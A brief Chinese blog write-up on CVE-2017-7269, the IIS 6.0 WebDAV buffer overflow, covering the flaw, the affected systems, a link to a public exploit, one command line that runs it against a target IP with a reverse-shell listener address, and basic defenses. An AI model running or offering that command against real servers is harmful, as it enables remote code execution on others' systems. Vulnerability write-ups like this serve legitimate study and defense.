IIS RCE-CVE-2017-7269
1.介绍
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的
ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的长标头执行任
意代码 PROPFIND请求
2.影响范围
WiNdows Server 2003 R2上使用IIS6.0并开启 WebDAV扩展。
3.复现
POC地址:https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
python iis 192.168.0.115 80 192.168.0.154 9999 |
4.防御
1.关闭 WebDav服务
2.升级
3.部署安全设备
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 是苹果啊!
wechat
alipay
